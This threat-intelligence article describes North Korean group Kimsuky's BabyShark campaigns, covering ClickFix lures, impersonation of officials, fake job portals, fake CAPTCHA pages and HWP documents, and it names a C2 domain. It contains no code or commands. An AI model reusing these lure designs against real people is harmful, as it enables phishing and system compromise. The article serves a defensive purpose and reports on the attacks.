BabyShark Attack Campaign

Cybersecurity researchers have uncovered continued and evolving attacks by the North Korean hacker group Kimsuky, who are using an elaborate social engineering tactic known as ClickFix to spread the BabyShark malware. These campaigns target national security experts and leverage both human deception and technical stealth to gain long-term access to victim systems.

Targeting Experts with Spear-Phishing Lures

The Kimsuky threat group has been actively deploying spear-phishing emails since January 2025, initially focusing on South Korean national security experts. The attackers masquerade as representatives from a legitimate German-language business publication and entice victims with fake interview requests. These emails contain links to malicious RAR archives, which, once opened, deploy a Visual Basic Script (VBS). This script launches a decoy Google Docs file to appear legitimate while quietly executing code to establish persistence through scheduled tasks and steal system information.

Deceptive Personas and Modified ClickFix Variants

By March 2025, Kimsuky escalated its efforts by impersonating a high-ranking U.S. national security official. The new phishing emails featured a PDF with a list of fabricated meeting questions and tricked recipients into entering an 'authentication code' to access supposed secure content. This represents a shift in the ClickFix method, from fixing fake errors to entering codes, enhancing the illusion of legitimacy.

In April 2025, another variant emerged, this time impersonating a Japanese diplomat and referencing a proposed meeting with the Japanese ambassador to the U.S. The attack again used a decoy Google Docs page to mask the execution of an obfuscated PowerShell command, allowing continued data exfiltration and payload deployment via persistent C2 communication.

Weaponizing Fake Job Portals and Pop-Ups

In a more elaborate twist, Kimsuky began using fake websites impersonating defense research job portals. These sites displayed bogus job listings which, when clicked, triggered ClickFix-style pop-ups urging users to open the Windows Run dialog and execute a PowerShell command.
This command directed users to install Chrome Remote Desktop, giving attackers full remote access via SSH through the C2 domain kida.plusdocs.kro.kr. A misconfiguration on the C2 server revealed exposed victim data, believed to have originated from compromised South Korean systems. Additionally, a Chinese IP linked to this infrastructure contained a keylogging log and a Proton Drive ZIP archive delivering BabyShark through a complex multi-stage chain.

Recent Innovations: Fake CAPTCHA and AutoIt Deployment

As recently as June 2025, Kimsuky began exploiting fake Naver CAPTCHA verification pages. These fake pages instructed users to paste PowerShell commands into the Run dialog, executing an AutoIt script that harvested sensitive information. This further demonstrates the group’s adaptive use of script-based tools and social engineering to maintain their foothold in victim environments.

Expanding Phishing Fronts: Academic Disguise and HWP Attacks

Beyond ClickFix, Kimsuky has also been linked to phishing campaigns disguised as academic correspondence. These emails appear to be requests to review a research paper and include a password-protected HWP document. Once opened, the malicious document leverages an embedded OLE object to run a PowerShell script. This script conducts detailed system reconnaissance and deploys AnyDesk, a legitimate remote desktop tool, to maintain persistent remote access.

Key Takeaways: Tactics and Techniques at a Glance

Kimsuky’s social engineering attacks rely on:

• Impersonation of trusted figures and institutions (journalists, diplomats, academics)
• Use of decoy files (Google Docs, PDFs, HWP documents) to mask malicious activity
• Manipulation of users into running PowerShell commands through fake errors, authentication prompts, or CAPTCHA pages

Technical hallmarks of the campaign include:

• Persistent access via scheduled tasks and remote access software (AnyDesk, Chrome Remote Desktop)
• Multi-stage delivery of BabyShark malware
• Use of script-based automation tools like AutoIt
• Exploited infrastructure vulnerabilities exposing stolen victim data

Conclusion: A Constantly Evolving Threat

The BabyShark campaign illustrates Kimsuky’s agility in evolving their social engineering techniques and leveraging legitimate software and public infrastructure for malicious purposes. The ClickFix strategy highlights how threat actors continue to exploit human behavior as much as system vulnerabilities. Vigilance, layered defense strategies, and user education remain crucial to mitigating the risks posed by such sophisticated threat actors.